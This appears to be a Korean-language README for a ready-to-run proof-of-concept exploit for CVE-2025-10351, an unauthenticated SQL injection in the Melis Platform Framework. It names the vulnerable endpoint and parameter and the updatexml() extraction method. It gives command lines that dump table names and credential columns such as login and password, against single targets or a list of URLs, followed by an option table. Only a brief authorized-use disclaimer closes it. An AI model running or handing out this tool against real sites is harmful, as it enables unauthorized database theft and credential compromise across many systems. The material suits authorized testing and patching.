
CVE-2025-10351 익스플로잇. Melis Platform Framework의 SQL Injection.
CVE-2025-10351의 POC: Melis Platform Framework의 특정 엔드포인트에 영향을 미치는 인증되지 않은 SQL 인젝션 취약점.
이 POC는 다음 엔드포인트의 인증되지 않은 오류 기반 SQL 인젝션 취약점을 대상으로 합니다:
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
MySQL의 updatexml()을 사용하여 다음을 추출합니다:
또한 추가 수동 익스플로잇을 위해 가능한 벡터를 탐지합니다.
다음으로 종속성을 설치합니다:
pip3 install -r requirements.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
python3 CVE-2025-10351-POC.py -l targets.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
| Argument | Description |
|---|---|
-u | 대상 URL |
-p | 포트 (80, 443 등) |
-l | URL 목록이 포함된 파일 |
-s | 시간 기반 테스트를 위한 대기 시간 (기본값: 1초) |
-at | 모든 테이블 이름 덤프 |
-t | 테이블 이름 지정 |
-ac | 지정된 테이블의 모든 열 덤프 |
-c | 덤프할 열의 쉼표로 구분된 목록 |
--proxy | Burp Proxy http://127.0.0.1:8080 |
--insecure | 프록시 연결 시 TLS 검사 비활성화 |
--cookie | 인증 요청을 위한 쿠키 |
--debug | 디버그 모드 |
tables_extracted.txt에 저장됨<table_name>_data.txt에 저장됨이 문서는 승인된 보안 테스트 및 수정 용도로만 제공됩니다. 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 대해 PoC 또는 재현 단계를 사용하지 마십시오. 작성자는 오용에 대해 책임을 지지 않습니다.
Manuel Iván San Martín Castillo가 ❤️를 담아 만들었습니다.